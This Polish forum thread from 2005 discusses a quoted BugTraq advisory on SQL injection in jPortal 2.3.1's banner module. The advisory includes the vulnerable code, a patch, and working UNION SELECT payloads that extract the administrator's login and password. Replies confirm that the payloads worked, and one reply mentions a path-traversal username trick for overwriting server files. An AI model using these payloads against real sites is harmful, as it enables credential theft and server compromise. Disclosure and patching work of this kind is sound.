ra-v Opublikowano 24 Czerwca 2005 Zgłoś Opublikowano 24 Czerwca 2005 Otóz ciekaw jestem czy ten BugTraq dziala oto jego zawartośc Hello BugTraq, I've found possibility to inject sql code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php). Bug is in these lines of code: $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; - line 192. There is unfiltered variable $haslo. In order to patch this code just do this: $haslo = addslashes($haslo);$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [exploit] go to http://[victim]/jportal/banner.php and try this: ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 After that, You gain login and password of administrator. [/exploit] [exploit2] try to inject this code: ' or id='x x - banner id After that, You can see statistics of not banners, to which you haven't got passwords. [/exploit2] źródło : http://seclists.org/lists/bugtraq/2005/Apr/0143.html Co prawda tekst w jezyku angelskim ale łatwo sie połapać o co chodzi... prbowałem tej metody ale niestety nie działa... i co wy na to ??? Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
ParanoiK Opublikowano 24 Czerwca 2005 Zgłoś Opublikowano 24 Czerwca 2005 Jak testowałem na świeżo postawionej wersji (tylko nie pamiętam której) to działała ;] Zresztą drugi inject dotyczący print.php też ;] Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
ra-v Opublikowano 24 Czerwca 2005 Zgłoś Opublikowano 24 Czerwca 2005 ale ParanoiK wiesz gdzie wpisać te kody ??? Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
ParanoiK Opublikowano 26 Czerwca 2005 Zgłoś Opublikowano 26 Czerwca 2005 Wszystko masz opisane ;] Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...
~blacksheep Opublikowano 29 Czerwca 2005 Zgłoś Opublikowano 29 Czerwca 2005 Nie jest to pierwszy i ostatni bug w jportalu, chociaż w najnowszej wersji już poprawili. W ogóle jak sobie poczytałem kod to jest co najmniej dziwny - np. zapisywanie timestampów w /online_x zamiast w bazie danych. No, ale dobre bo polskie ;). Kiedyś dało się jeszcze zarejestrować jako użytkownik '../../jakiś_plil' i nadpisywać w ten sposób pliki na serwerze. Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach Więcej opcji udostępniania...